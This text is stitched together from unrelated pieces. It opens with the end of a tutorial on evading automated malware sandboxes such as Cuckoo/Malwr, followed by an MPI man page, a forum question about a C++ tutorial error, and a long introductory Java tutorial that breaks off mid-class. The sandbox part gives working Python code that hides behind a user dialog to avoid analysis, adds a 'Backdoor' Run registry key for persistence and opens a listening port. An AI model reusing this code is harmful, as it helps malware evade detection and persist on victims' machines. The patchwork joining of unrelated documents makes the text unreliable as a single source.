Next, I used PyInstaller to export the script to exe format. I named the file Sandboxing.exe and submitted it to the Malwr website. In summary, the analysis output detected our actions, as you can see below
For the full analysis report, please see
Phase 3, 4
Now comes the fun part. As I stated earlier, we need to create a check-box dialog window where the user must first tick one of the provided check boxes, and then click the Continue button.
Important note: Cuckoo is intelligent enough to bypass a regular message-box trick. Therefore, in our code we force the user to perform a couple of actions: tick a check box, then click the Continue button.
from Tkinter import *
master = Tk()

def evasion():
    def donothing():  # …………… 1
        # Do nothin'
        pass
    master.protocol("WM_DELETE_WINDOW", donothing)  # when X is clicked, do nothing

    # …………… 2
    Label(master, text=" Choose Your Editing Type: ").grid(row=0, sticky=W)
    var1 = IntVar()
    Checkbutton(master, text=" Online Editing ", variable=var1).grid(row=1, sticky=W)
    var2 = IntVar()
    Checkbutton(master, text=" Offline Editing ", variable=var2).grid(row=2, sticky=W)

    # …………… 3
    def quit():
        if var1.get() == 1 or var2.get() == 1:
            master.destroy()
    Button(master, text='Continue', command=quit).grid(row=4, sticky=W, pady=4)
    mainloop()

# …………… 4
evasion()
I used a very popular Python library called Tkinter to do the GUI job for me. First we create an object called master; then, inside the evasion function:
(1) We disable the “X” (close) button.
(2) We create a label text message with two check buttons – two trivial options are provided here, for “online” and “offline” editing.
(3) We create a Continue button; once clicked, it destroys the dialog window if and only if one of the check boxes has been ticked first. We achieve this using the quit function.
(4) Keep in mind that without destroying this window, our malicious code (opening a port and adding a registry key) will not be executed.
The end result is something similar to
Wrapping up the complete code:-
from Tkinter import *
master = Tk()

def evasion():
    def donothing():
        # Do nothin'
        pass
    master.protocol("WM_DELETE_WINDOW", donothing)  # when X is clicked, do nothing

    Label(master, text=" Choose Your Editing Type: ").grid(row=0, sticky=W)
    var1 = IntVar()
    Checkbutton(master, text=" Online Editing ", variable=var1).grid(row=1, sticky=W)
    var2 = IntVar()
    Checkbutton(master, text=" Offline Editing ", variable=var2).grid(row=2, sticky=W)

    def quit():
        if var1.get() == 1 or var2.get() == 1:
            master.destroy()
    Button(master, text='Continue', command=quit).grid(row=4, sticky=W, pady=4)
    mainloop()

evasion()

import _winreg as wreg
import socket

key = wreg.OpenKey(wreg.HKEY_CURRENT_USER,
                   "Software\Microsoft\Windows\CurrentVersion\Run",
                   0, wreg.KEY_ALL_ACCESS)
wreg.SetValueEx(key, 'Backdoor', 0, wreg.REG_SZ, 'C:\\bla.exe')
key.Close()

s = socket.socket()
host = socket.gethostname()
port = 80
s.bind((host, port))
s.listen(5)
Once again, we export the script to exe and submit it to Malwr, but this time the result doesn’t mention anything about opening a port or adding a registry key.
For the full analysis report, please see
However, if you run it under a live environment, you would see the final result as
Wonderful!!
Think out of the box
Based on the first analysis report, Malwr binds an IP of 192.168.56.x to port 80. This subnet looks very familiar to VirtualBox users, since it’s exactly the same subnet used by the VirtualBox host-only interface. Do you think this info can help in bypassing VM environments? Please share your thoughts in the comment section.
References
- Evading File-based Sandboxes, by FireEye team
- Malwr Services | http://resources.infosecinstitute.com/case-study-evading-automated-sandbox-python-poc/ | CC-MAIN-2018-30 | refinedweb | 1,098 | 57.37 |
MPI_Keyval_free - Frees attribute key for communicator cache attribute
-- use of this routine is deprecated.
#include <mpi.h>
int MPI_Keyval_free(int *keyval)
INCLUDE 'mpif.h'
MPI_KEYVAL_FREE(KEYVAL, IERROR)
INTEGER KEYVAL, IERROR
keyval Frees the integer key value (integer).
IERROR Fortran only: Error status (integer).
Note that use of this routine is deprecated as of MPI-2. Please use
MPI_Comm_free_keyval instead.
This deprecated routine is not available in C++.
Frees an extant attribute key. This function sets the value of keyval
to MPI_KEYVAL_INVALID. Note that it is not erroneous to free an
attribute key that is in use, because the actual free does not transpire
until after all references (in other communicators on the
process) to the key have been freed. These references need to be
explicitly freed by the program, either via calls to MPI_Attr_delete
that free one attribute instance, or by calls to MPI_Comm_free that
free all attribute instances associated with the freed communicator.

MPI_Keyval_free(3)
Part 12 is something I think I am not able to solve. My code was this:
// Template, major revision 3
// IGAD/NHTV - Jacco Bikker - 2006-2009

#include "string.h"
#include "surface.h"
#include "stdlib.h"
#include "template.h"
#include "game.h"

using namespace Tmpl8;

class Tank
{
public:
    Tank()
    {
        x = 0;
        y = 4 * 64;
        rotation = 0;
    }
    void Move( Surface* a_Screen )
    {
        x++;
        if ( x > ( 16 * 64 ) ) x = 0;
        tank.Draw( x, y, a_Screen );
    }
    int x, y, rotation;
};

Tank mytank;

void Game::Init()
{
}

void Game::Tick( float a_DT )
{
    mytank.Move( m_Screen );
}
The errors I got:
1>c:\-\part12\game.cpp(25) : error C2065: 'tank' : undeclared identifier
1>c:\-\part12\game.cpp(25) : error C2228: left of '.Draw' must have class/struct/union
I thought it was weird, since this is exactly what was written in the tutorial. Luckily, I thought I understood the problem, so I
changed 'tank.Draw' to 'Tank.Draw'. Unfortunately, this gave me these errors (both the same?):
1>c:\-\part12\game.cpp(25) : error C2143: syntax error : missing ';' before '.'
1>c:\-\part12\game.cpp(25) : error C2143: syntax error : missing ';' before '.'
This is where I got stuck... does anyone know how to solve this problem?
Rimevan | http://devmaster.net/forums/topic/16018-problem-with-c-tutorial-part-12-classes/page__p__83815?forceDownload=1&_k=880ea6a14ea49e853634fbdc5015a024 | CC-MAIN-2013-20 | refinedweb | 197 | 71.31 |
When I try to run the "python -m designer" command I get this error:
File "designer/app.py", line 14, in <module>
from designer.components.dialogs.add_file import AddFileDialog
File "designer/components/dialogs/add_file.py", line 5, in <module>
from kivy.garden.xpopup.file import XFileOpen, XFolder
ImportError: No module named xpopup.file
I have installed Kivy Designer on Ubuntu 16.04 LTS and Windows 10. I have a problem running Kivy Designer on Ubuntu 16.04 LTS; it always crashes. But I have no problem running it on Windows 10 64-bit using Python 3.6.2. You have to do the following:
To install the XPopup enter a console (on Windows use kivy.bat in the kivy folder):
garden install xpopup
Java is a trademark of
Sun Microsystems, Inc.
This tutorial introduction to Java is intended to provide some familiarity with the
language syntax, its capabilities, and the history of its development. In conjunction
with our pages on
Smalltalk and
C++,
it will help in comparing various object-oriented programming languages (OOPLs).
(Also see our
OOPL comparison chart.)
At the end of this page, there are links to more information
about Java, including how to download the Java development kit and several free Java
development environments.
This tutorial assumes no previous knowledge of Java or C, but does assume that
the reader has done programming in some computer language. It also assumes familiarity with
object-oriented concepts.
During the late 1980s and early 1990s, several candidates competed
to fill the role of "a better C" (to use the term applied by
Bjarne Stroustrup to C++).
"A better C" was generally taken to mean a programming language that was comfortable
to programmers trained in the C language, eliminated some of the known problems with C,
was capable of high performance, and incorporated modern object-oriented features.
C++, for a while the leading contender, emphasized compatibility and performance.
Objective-C sacrificed some C compatibility for the sake of a "purer" approach to
object-orientation based on Smalltalk.
The apparent winner, however, is a relative latecomer, Java. (Though a recent entrant into the
field, Microsoft's
C#, may contest the title.)
Java didn't set out to be a better C for every programmer, and in fact had an identity crisis
early in its life. It started out in 1991 as a language called "Oak", part of a small project
called the "Green Team" initiated by Patrick Naughton, Mike Sheridan, and
James Gosling, who is primarily credited with the design of the language that became Java.
(Bryan Youmans has a page on the
history of Java, with some interesting thoughts on the language design. There's also an
official version of the history from Sun.)
The original goal of the Green Team was to produce a single operating environment that
could be used for controlling a wide range of consumer devices such as video games and
TV set-top boxes. A key part of the environment would be a programming language that
was completely independent of the processor it ran on. The image of "Duke" (shown at right),
well-known as the Java mascot, dates from this period; Duke represented a software agent who
performed tasks on behalf of the end user.
As it turned out, targeted industries such as cable TV were not ready for the concepts
the Green Team was selling, but the kind of active, user-selected content they had
envisioned was emerging in a new medium: The Internet.
So in 1995, Java found a market: Delivering a new level of interactivity
to client browsers on the World Wide Web. Its ability to run the same code on any
processor ("write once, run anywhere" was the slogan) was exactly what was needed
to download chunks of code called "applets" to be run on a heterogeneous universe
of client architectures.
An example of a Java applet providing "active content" in a web page is shown at right.
This is a molecule viewer displaying a molecule of the sodium salt of hyaluronic acid.
By holding down the left mouse button and moving the mouse, you can rotate the molecule
around an axis aligned in any direction in the plane of the page.
(If you're interested, here's the Java source code for
this applet. Originally developed at the University of Leeds, it is shipped by Sun as a demo
with the
Java Development Kit.)
In 1995, the sense was, as
Wired put it, that "Java holds the promise of caffeinating the Web, supercharging it
with interactive games and animation and thousands of application programs nobody's even thought
of". Nearly a decade later, with many other technologies available for delivering active
content, Java applets play a minor role. Java has prospered, though, running on middleware
servers and even mainframes. It may even be coming full circle with Sun's
EmbeddedJava and
Wireless Java, which promise to make Java the kind of ubiquitous platform the
Green Team originally envisioned.
The technology that allows Java applets to be downloaded and run on many different
client machines is called the
Java virtual machine (JVM), and is similar to the virtual machine that is
the runtime engine for Smalltalk systems. Most computer languages are compiled from
source code into machine language specific to the computer on which they will run.
On the web, it is not feasible to dynamically compile applets when they run.
So Java is normally compiled into low-level, machine-independent bytecodes,
which form the module that is downloaded to a client machine and executed by
the JVM resident on the machine. A full discussion is beyond the scope of this
tutorial, but virtual machine architectures have proved to be a relatively simple
way to provide language support across a broad range of machine architectures.
The downside of virtual machines is that they cannot provide
performance equivalent to fully compiled code. However, experience with Smalltalk and
Java has shown that performance is adequate for most applications, and that
certain techniques allow VMs to come very close to the performance of native
compilation. VMs also have the advantage that they can enforce dynamic runtime constraints,
such as security rules that are essential for running active content in web browsers.
Since we are primarily presenting the Java language here, the JVM and
other non-language aspects of the Java platform will not be discussed further.
The Java language is based on C, so it is first necessary to know a little about the C
Language. If you are already familiar with C, you can skip the next section. If not,
please read it, since many of the operators and logic control constructs of C are
used almost identically in Java.
The following, from the famous
Kernighan and Ritchie book, is a simple C program:
#include <stdio.h>
main () // A very simple program
{
printf("hello, world\n");
}
The #include embeds definitions from the standard I/O
library needed for the printf statement. Every C
program has a main() function, which is called when the
program is executed. Braces ( { } ) delineate blocks of
statements, in this case the single statement making up the body of
main(). This statement prints
"hello, world" when the program is executed ("\n" is the code for line feed, i.e., it indicates a line
termination). The semicolon terminates a statement. The double quote is the character string delimiter
in C; the comment delimiter is a double slash (//). Comments may also be delimited by
bracketing them with "/*" and "*/".
Variables in C may be primitive types, such as characters and numbers:
char c = 'c'; // Character
int i = 10; // Integer
double x = 12.34 ; // Floating point number
Each of the statements above does two things: it declares the variable to
be a certain type, e.g., int (integer),
and it also sets the value of the variable. We could just as well do these
two things in separate statements:
int i;
i = 10;
Every variable must be declared, however, before it can be used.
Variables may also be arrays of primitive types:
char c[] = {'c', 'h', 'a', 'r'}; // Array of characters (string)
char c[] = "char"; // Alternative way of initializing a string
int i[] = {2, 3, 5, 7}; // Array of integers
Arrays are referenced by the index of their elements, starting at zero
for the first element; e.g., c[3]
returns 'r'. (Some other
languages, such as Smalltalk, use 1 instead of 0 as the index of the first element in
an array).
C variables may also be structures, containing other variables
of different types. For example, the data associated with a bank savings
account might be represented as:
struct savingsAccount {
int balance;
int accountNumber;
char name[30];
};
The individual variables, or members, of the structure are referenced
by qualifying the structure name with the member name:
struct savingsAccount myAccount;
// Initialize the new account
myAccount.balance = 0;
myAccount.number = "1234";
myAccount.name = "Dave Collins";
In addition to
main(), a program can have any number of other
functions:
#include <stdio.h>
int cube(int x) {
return x * x * x;
}
main () {
int i;
for(i = 1; i <= 10; i++)
printf("%i %s %i %s", i, " cubed is ", cube(i), "\n");
}
This example adds the function cube(int x),
which returns x3 and is called from main(),
plus a few other constructs. The expression i++
is common in C; it means "use the value of i,
then increment i by one." The entire
for expression means "start with
i set to 1; use i
in the statement (or block of statements) after the for; increment
i by 1; keep doing this until
i gets to 10; then continue the program after the
for."
The string "%i %s %i %s", first argument
to the printf, is a format definition, which
is required when printing multiple fields; it indicates that the following arguments are to be
printed as integer, string, integer, string. The resulting output is
1 cubed is 1
2 cubed is 8
3 cubed is 27
4 cubed is 64
5 cubed is 125
6 cubed is 216
7 cubed is 343
8 cubed is 512
9 cubed is 729
10 cubed is 1000
The C if and while
control structures resemble the for. Here is an example of
if:
int i, j;
if (i == 0) {
j = 10;
i++;
printf(i);
}
Notice that the equality test in C is ==, and = is used for assignment. Most other operators
are like those in other languages; != means "not equal."
You will frequently encounter in C programs the rather cryptic variant
int i;
if (!i) . . .
instead of
int i;
if (i == 0) . . .
This works because C does not have a boolean type; instead, it uses 0 for false, and
any integer greater than zero for true. Thus !i
means "i is false," which is precisely equivalent to
i == 0. (This code would not be legal in Java, which has a
boolean primitive type, and does not allow
conversion between integers and booleans.)
C, unlike Java or Smalltalk, explicitly differentiates accessing an object directly (by value)
from accessing it through a pointer (by reference). This is illustrated in the following example:
int sum1(int x, int y) {
return x + y;
}
int sum2(int *x, int *y) {
return *x + *y;
}
int result1, result2;
int i, j; int *pi, *pj;
i = j = 10;
pi = &i; pj = &j;
result1 = sum1(i, j);
result2 = sum2(pi, pj);
The variables i and j
are declared as integers and set to 10. The variables pi
and pj are declared as pointers to integers, and set
to the addresses of i and
j (int *pi means
"the object pointed to by i is an integer";
&i means "the address of i").
Pointer references are useful when objects are large, because passing a pointer is faster than
copying the object. They are needed when objects are dynamically allocated, since their locations
are not known at the time the program is compiled.
Java still has the distinction between value and reference, but it
is handled automatically: "primitive" types (such as integers) are always accessed by value,
complex types (objects and arrays) are always accessed by reference. Creation and dereferencing
of pointers is handled "under the covers," so the programmer is not explicitly
aware of it. This results in a significant simplification, which undoubtedly contributes to Java's
popularity.
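The difference can be seen in a small sketch (the class and method names here are illustrative, not from the tutorial): a primitive argument is copied into the method, while an array argument is passed as a reference, so changes made through it are visible to the caller.

```java
// Primitives are passed by value; arrays and objects by reference.
public class RefDemo {
    // Receives a copy of the int; the caller's variable is untouched.
    static void setValue(int v) { v = 100; }

    // Receives a reference to the array; the caller sees the change.
    static void setFirst(int[] a) { a[0] = 100; }

    public static void main(String[] argv) {
        int i = 0;
        int[] arr = { 0 };
        setValue(i);
        setFirst(arr);
        System.out.println(i + " " + arr[0]);  // prints "0 100"
    }
}
```

No `&` or `*` appears anywhere: the reference semantics for the array are supplied automatically.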
Pointers allow the programmer to statically compile only a pointer, then dynamically allocate
storage for the creation of data structures or objects at runtime. For example:
struct savingsAccount *myAccount;
int size = sizeof(struct savingsAccount);
. . . .
// Allocate storage for the account
myAccount = (struct savingsAccount *) malloc(size);
myAccount->balance = 0;
myAccount->accountNumber = 1234;
myAccount->name = "Dave Collins";
. . . .
// Free the storage used for the account
free(myAccount);
malloc is a system function for
memory allocation.
Storage gotten with malloc
must be explicitly released using free. Otherwise,
it will be released only when the program ends, and the program may exhaust all the
available storage if large numbers of arrays and structs are created. It is also important that
the storage not be freed while it is still in use.
Notice that whereas a direct structure reference uses dot notation
(e.g., myAccount.balance), structure
reference via a pointer uses an arrow (e.g., myAccount->balance).
The operation in the fifth line of the above example,
(struct savingsAccount *), is
a cast, explained below. It tells the C compiler that what is returned
by malloc, which is a pointer to a
block of storage, is now to be treated as a pointer to a
savingsAccount structure.
Storage management is a major source of errors in C and C++ programs. Java, like
Smalltalk, uses garbage collection and does not permit programmers to manage
storage usage explicitly. The garbage collector runs periodically, and determines
whether any references exist to objects. If not, the objects are deleted and their
storage is freed. The designers of Java argued that the small additional overhead
of garbage collection is a reasonable price to pay in return for not being exposed
to storage allocation and deallocation errors made by programmers.
One more feature of C that is relevant to Java is the notion of a cast. Casting,
or type conversion, changes the type of an object. As an example of why this might
be necessary, the standard C library function
sqrt, which returns the
square root of its argument, takes a floating-point double
as its argument. Suppose we want the square root of an int
- the cast operator (double)
performs the appropriate conversion before calling
sqrt:
int i;
double x, y;
. . . .
i = 5;
. . . .
x = (double) i;
y = sqrt(x);
Casting can be dangerous, particularly in combination with other error-prone
features such as pointers; what will be the result of this code?
#include <stdio.h>
#include <math.h>
main () {
int i, j;
int *pi;
double x, y;
i = 4;
pi = &i;
j = (int) pi; // Casts from pointer to int, to int
x = (double) j;
y = sqrt(x);
printf("%s %i %s %f %s", "Square root of ", i, " is ", y, "\n");
}
The compiler says everything is fine, but the program prints out
Square root of 4 is 1115.818982
In line 9, the programmer casts pi
to int;
pi, defined as "pointer to int", is
a machine memory address, essentially a random number, thus the result.
This error looks implausible in a short program; but in programs containing
thousands of lines of code, perhaps written by several programmers, errors like
this are not uncommon, and notoriously difficult to find.
Java also permits C-type casting. Java compilers are stricter than C compilers
about issuing errors or warnings about dangerous casts, but it is still possible
to create bugs, particularly with primitive types.
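As an illustrative sketch (not from the original text), a narrowing primitive cast compiles cleanly but silently discards information:

```java
// A narrowing cast from double to int truncates the fraction, with no
// compile-time error and no runtime warning.
public class CastDemo {
    static int truncate(double x) {
        return (int) x;  // legal, but the fractional part is lost
    }

    public static void main(String[] argv) {
        System.out.println(truncate(1115.818982));  // prints 1115
    }
}
```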
Java, like C++, Objective-C, and C#, adds objects, classes, and inheritance to C.
Before delving too deeply into these object-oriented features, let's look
at the syntax of a couple of simple Java programs.
Simple Java programs:
Here is the Java equivalent to the Kernighan and Ritchie "hello world" program:
// A very simple class
public class HelloWorld {
public static void main(String[] argv)
{
System.out.print("hello, world\n");
}
}
There are a few superficial differences, such as the specification of the
argv parameter for the
main() function,
which passes the command-line arguments, if any, that were entered by the user when the
program was started. (argv
is actually used in C too, but need not be specified if there are no arguments
expected. Java is stricter about function signatures.)
A significant difference is that main()
is no longer a free-floating function, it is a method in the class
HelloWorld. Unlike in C (which
does not have classes), or even in C++, functions in Java can only exist as methods
in a class. Another example of this is how the program prints "hello, world".
In C, printf is a function to
print to an output stream; the default output stream is stdout, which is normally
assigned to the console or command window from which a program is executed.
In Java, the standard output goes to an instance of the
PrintStream class. This
instance is stored as a static variable in the
System class. So the fifth
line in the program gets a PrintStream
instance from the variable out
in System and invokes its
print method with the string
"hello, world" as argument.
Notice that there is no #include
statement. The concept in Java that is roughly analogous to
#include is
import, which names a
package and causes the classes from that package to be accessible.
No import is needed
to access System here,
but only because System is
part of the java.lang
package, which is automatically imported for all Java programs. We could have
added
import java.lang.*;
as the first line of the program, but in this special case it is not necessary.
The "*" implies that all classes in a package are to be imported; it is also
possible to import individual classes:
import java.lang.System;
Note that the dot notation used to reference fields and methods in an object is
descended from the dot notation used in a C-language
struct. In fact, one way
to think of a class in Java is as a
struct that has
functions (methods) as well as data fields or members. (In C++, struct
is synonymous with class; Java
does not use the struct keyword.)
Methods and variables defined with the keyword
static
are called class methods and class fields. They are
associated with the class, and do not require creation of an instance. Standalone
programs like this are compiled from source code containing a single public class,
which produces a Java class file (named, in this case,
HelloWorld.class).
The class file is executed from a command like this:
java HelloWorld
Which tells the Java runtime module to look for class file
HelloWorld.class,
and start executing its main
method. (Other ways of executing Java programs, such as the applet we talked about
earlier, are discussed below.)
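A small sketch (the class and member names are invented for illustration) of class fields and class methods: both belong to the class itself and are used without creating an instance.

```java
// A static field and static method, accessed through the class name alone.
public class StaticDemo {
    static int counter = 0;            // one copy, shared by the whole class
    static void bump() { counter++; }  // callable without any instance

    public static void main(String[] argv) {
        StaticDemo.bump();
        StaticDemo.bump();
        System.out.println(StaticDemo.counter);  // prints 2
    }
}
```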
Here is a more complicated program, similar to the C program above that
prints the cubes of the integers 1-10. This progam adds the functionality
of accepting a command-line argument specifying how many cubes are to be
printed:
public class PrintCubes {
private static int cube(int x) {
return x*x*x;
}
public static void main(String[] argv) {
int i, iterations;
if (argv.length != 0) iterations = Integer.parseInt(argv[0]); // Line 8
else iterations = 10;
for(i = 1; i <= iterations; i++)
System.out.println(i + " cubed is " + cube(i)); // Line 11
}
}
Notice that the function cube
is private, meaning it can only be invoked from within the
HelloWorld class. The
main method must be
public, since it is invoked from outside the class. Java also has a
protected modifier, designating a method that can be invoked from within
the class or from any of its subclasses, but not from unrelated classes.
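The three modifiers can be sketched side by side in one hypothetical class (the names here are illustrative):

```java
// public, protected, and private members in a single class.
public class Counter {
    private int count = 0;                      // accessible only within Counter
    protected void reset() { count = 0; }       // accessible in Counter and its subclasses
    public int increment() { return ++count; }  // accessible from any class

    public static void main(String[] argv) {
        Counter c = new Counter();
        c.increment();
        System.out.println(c.increment());  // prints 2
    }
}
```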
Line 8 says "if there is a command line argument, assume it is an integer specifying the
number of cubes to be printed". Before unpacking this, a brief digression: Java, for
efficiency and compatibility, retains all the primitive data types of C:
int, double, etc., and even adds
some new ones, such as boolean.
These are not objects, i.e., they are not instances of classes. (Thus Java is
not a "pure" object-oriented language like Smalltalk.) Corresponding to each primitive
type, however, is a class with a similar name:
Integer corresponding to
int,
Boolean corresponding to
boolean, etc. Each of
these classes just "wraps" a primitive value, and adds behavior to it.
The most common use of these wrapper classes is to store primitive objects in
collections. Though the Java primitive array
can hold primitive values, just as in C, instances of the more complex collection
classes (such as ArrayList,
which is used in the banking example below) cannot. These collections must
hold reference, or object, types rather than primitives, thus the need
for wrapper classes.
Another example of added behavior is used in line 8:
argv[0], the first
command line argument, is a string (just as in C). The
Integer class has a
static method parseInt()
that takes a string like "20" as argument and answers the corresponding
int value. Line 8 of the
program uses this to set
iterations
to the command-line argument entered by the user.
Class Integer also has
a constructor function that takes a string as argument, and returns an
Integer
instance that wraps the corresponding int
value. E.g.,
new Integer("20")
instantiates an instance of Integer
wrapping the integer value 20. (The
new operator must
always be used when invoking a constructor.)
The method intValue(), invoked on the
instance just constructed, returns the int 20.
Thus instead of using parseInt(), line
8 of the program could have been coded as
if (argv.length != 0) iterations = (new Integer(argv[0])).intValue();
Note that all the standard "primitive" computational operators such as + require
that their operands be int
values, and will not work with Integer
instances. As mentioned above, there are other contexts (such as holding numbers in collections)
where we need objects, not primitive types; in those contexts we use objects like
Integer and
Double instances rather than
int or
double primitives.
This complicatation is not present in C, or in OO languages such as Smalltalk, which do
not have primitive types at all.
One last point on this program: The + in line 11 is not doing addition,
it is a string concatenation operator. If one of the arguments to + is a
String, and
the type of the result (in this case, the type of the argument expected by
println) is
String, Java
assumes string concatenation and converts the other argument to a String.
(All objects and primitives in Java can be converted to String.)
String concatenation is
the only case where the operator + can be overloaded in this way.
In the example application below, we use instances of another number class,
BigDecimal; in calculating
with BigDecimal, we must use
methods like add() and
multiply(), rather than
primitive operators like + and *. This inability to overload is
a purely syntactic feature of Java; other OO languages, such as C++ and Smalltalk,
do allow overloading of infix arithmetic operators.
Object-oriented programming in Java:
The two programs above, though they are implemented as Java classes, are
not object-oriented in spirit. HelloWorld
and PrintCubes are really just procedural
programs with a veneer of objects. For programmers coming to Java from C or another
procedural language, writing thinly-disguised procedural code is an easy trap to fall into.
As a consequence, the programmer loses the the clarity and structuring capabilities that
constitute the power of object-oriented programming.
A "real" Java progam contains the following elements:
A class with a method that kicks everything off. The method varies;
programs executed from a command line, like
HelloWorld, start from
the main() method.
Applets and servlets, described later, use different methods, but the
basic idea is the same.
A collection of classes, related by inheritance and composition. These
classes are abstractions of the entities in the problem domain relevant to
the program: bank accounts, phone books, folders, contact lists, customers, whatever.
The program creates instances of these classes and sends messages (method invocations)
to them to execute operations. Any instance (object) may create other objects to perform
operations on its behalf. When an instance has no more work to do, the object that created
it will free it, and it will be garbage-collected.
The operation of the programs may cause changes in objects that are
permanently stored in databases. The changed objects may later be rematerialized
by this or another program as Java object instances.
When all the actions of a program have been completed, the "kick-off"
method, e.g., main(), returns
to wherever it was invoked from.
The big picture, which is the same for Java or any other OOPL, is this: In
procedural programs, work is done by passing data to functions; the overall work
of a program is done by a collection of functions derived by "top-down functional
decomposition". In object programs, work is done by message-passing among autonomous
objects, derived by analysis of the entities in the real-world problem domain. Each
object encapsulates both data and functionality, and other objects
know only its interface, not the details of its implementation.
Before looking at an example application (which sends
promotional letters to all the accountholders at a bank), let's examine the
structure of the source code for a Java class, since classes (and their
instances) are the building blocks of all Java programs.
Structure of a Java class:
Here's the outline of a class definition. We'll discuss only the highlights here:
<modifiers> class <class_name>
extends <superclass_name>
implements <interface_name> {
<static field (class variable) definitions>
<field (instance variable) definitions>
<static initializer block>
<constructor method definitions>
<static (class) method definitions>
<(instance) method definitions>
}
The most common modifier for a class is public,
indicating that the class is accessible to any other class in the program. Another common
modifier is abstract, indicating that
the class cannot be instantiated. This is done when a superclass is meant only to provide
common behavior to concrete subclasses (the BankAccount
class below is an example). The final modifier
indicates that a class cannot be subclassed; this is typically done for security reasons.
(The final modifier can also be used for
variables, in which case it means that the initial value set for the variable cannot be changed.
i.e., it is a constant.)
A class extends its superclass.
The classes in the example above, such as HelloWorld,
did not use this keyword. This does not mean they have no superclass; if the superclass is
not specified, it defaults to Object,
so we could have written
public class HelloWorld extends Object {
Passing over (for the moment) the meaning of implements,
we come to class and instance field (also called variable) definitions, which look like this:
<modifiers> <variable type> <variable name>;
These are comparable to data definitions
in C, but with added modifiers like public,
private, and
protected, which have the same
meaning as described above for methods (i.e., they control the scope of visibility of
the variable).
A static initializer block is an unnamed block of code inside brackets ( { and } )
that is executed once when the class is loaded. It is used, if necessary, to perform
complex initializations such as setting up tables, etc.
Next we find definitions of constructors, which are like methods with the same
name as the class, used to initialize new instances. Constructors are defined
with no explicit return type, since they always return an instance of the class in which they
are defined. (An example of a class with more than one constructor is shown below.)
Constructors are always invoked with the new
operator, e.g., for the class Point,
which can take as constructor arguments the x and y coordinates of the point:
Point originPoint = new Point(0, 0);
Finally, there are method definitions; those defined as static
are class methods, the remainder are instance methods. These look a lot like C function
definitions, except for the modifiers and the fact that functions in Java are always defined as methods within
the body of a class definition:
<modifiers> <return type> <method name>(<argument definitions>) {
<method code>
}
There is one extra "hidden" parameter passed to any
instance method, which is the particular object that is the "message receiver". This
object can be explicitly identified within the method body as
this, though it is usually not
necessary; any method invocation that does not explicitly identify the receiving
object automatically goes against this.
So these two lines of code within a method produce identical results:
public int fooMethod {
result = doIt();
result = this.doIt();
. . . .
Java interfaces and dynamic binding:
The keyword implements in a class definition
refers to a Java interface. An interface is a specification of methods that can be implemented
by any class. Interfaces can be used to document the "contract" that must be fulfilled by
certain objects. They are also essential for the general use of dynamic binding in Java. Recall that
dynamic or "late" binding is deferring the decision on which class a method comes from until
runtime. (The resulting behavior is called polymorphism.) An example is the method
toString(), which renders an object as
a string, usually for printing.
This method is defined in class Object, and
overridden in subclasses. Note the two invocations of
toString() in this code fragment:
Object printable;
TreeSet setOfInt = new TreeSet();
setOfInt.add(new Integer(1));
setOfInt.add(new Integer(2));
setOfInt.add(new Integer(3));
printable = new Integer(5);
System.out.println(printable.toString());
printable = setOfInt;
System.out.println(printable.toString());
Though printable is defined as
Object, the first occurrence invokes
toString()
in Integer (which prints
5), the second
invokes it in TreeSet (which
prints [1, 2, 3]. The choice of
method is based on the class of the actual object assigned to
printable.
The example just given depends only on inheritance; the compiler knows that
a valid toString() method
will exist at runtime for the class of the printable
object, because there is a default implementation of
toString()
in class Object.
Now let's look at an example that requires interfaces.
The TreeSet
class used above is a set (collection with no duplicate members) whose elements
can be iterated in order. To maintain its elements in sorted order,
TreeSet requires
that they support a method that allows two elements to be compared
to see which one goes first (this is essential for any sort algorithm).
The particular method that's used is
compareTo().
How can a TreeSet
guarantee that any object added to it supports
compareTo()?
It is not reasonable to just implement compareTo()
in class Object, because
some objects have no natural ordering. It's not even reasonable to make
all objects with a natural ordering inherit from something like
ComparableObject, because
comparability is just one small property among many similar ones that might
demand similar treatment; since Java only supports single inheritance,
a class could only inherit one of these properties.
Java's solution is interfaces. Though a class can inherit from only one superclass,
it can implement many interfaces. So a
TreeSet does not specify
any particular class for its elements, but requires that they implement the
Comparable interface.
The method that actually does the comparison (somewhat simplified) looks like
this:
// Compare two keys using the correct comparison method
private int compare(Object k1, Object k2) {
return ((Comparable)k1).compareTo(k2);
}
If the object being added does not implement
Comparable, the
cast (Comparable)k1
will fail. Similarly, in the following code line 2 is OK because class
Integer implements
Comparable, but line 3 will
cause an error because class Object
does not:
Comparable c, d;
c = new Integer(1);
d = new Object();
Thus in terms of type-checking, interfaces work just like classes,
but avoid the complexity of multiple inheritance. Other examples
of commonly-used interfaces in Java include
Collection,
which specifies the required interface for objects that hold collections
of other objects, and Serializable,
for objects that can render themselves as streams of bytes (e.g., for transmission
on a network or storage in a file).
Two example classes:
Here are two complete source files for Java classes used in the
sample application below:
BankAccount
and its subclass SavingsAccount.
They illustrate many of the points discussed above. Both classes import
java.math.* in order to
use the BigDecimal class,
which models fixed-point decimal numbers such as account balances. Because
BankAccount implements the
Comparable interface,
it must have a compareTo()
method, which in this case sorts by account number. The constructor insures that
the variable active is
always set in a new BankAccount.
import java.math.*;
public abstract class BankAccount implements Comparable {
private boolean active;
private BigDecimal balance;
private String accountNumber;
private Name name;
private Address address;
BankAccount() {
active = true;
}
public BigDecimal close() {
BigDecimal result = balance;
setBalance(new BigDecimal(0.0));
active = false;
return result;
}
public int compareTo(Object anObject) {
return
getAccountNumber().compareTo(((BankAccount)anObject).getAccountNumber());
}
public void deposit(BigDecimal anAmount) {
setBalance(getBalance().add(anAmount));
}
public String getAccountNumber() {
return accountNumber;
}
public abstract String getAccountType();
public Address getAddress() {
return address;
}
public BigDecimal getBalance() {
return balance;
}
public Name getName() {
return name;
}
public abstract BigDecimal getWithdrawalLimit();
public void setBalance(BigDecimal anAmount) {
balance = anAmount.setScale(2, BigDecimal.ROUND_HALF_DOWN);
}
public boolean isActive() {
return active;
}
public void setAccountNumber(String aNumber) {
accountNumber = aNumber;
}
public void setAddress(Address anAddress) {
address = anAddress;
}
public void setName(Name aName) {
name = aName;
}
public boolean withdraw(BigDecimal anAmount) {
boolean result;
if (result = (getWithdrawalLimit().compareTo(anAmount) > 0 ))
setBalance(getBalance().subtract(anAmount) );
return result;
}
}
Notice that BankAccount is abstract,
and it has two methods declared
abstract. These methods must
be implemented by any concrete subclass of
BankAccount, and they
are indeed implemented in the
SavingsAccount subclass:
import java.math.*;
public class SavingsAccount extends BankAccount {
private static final String ACCOUNT_TYPE = "S";
private static double interestRate;
public static void setInterestRate(double rate) {
interestRate = rate;
}
public static double getInterestRate() {
return interestRate;
}
SavingsAccount() { }
public String getAccountType() {
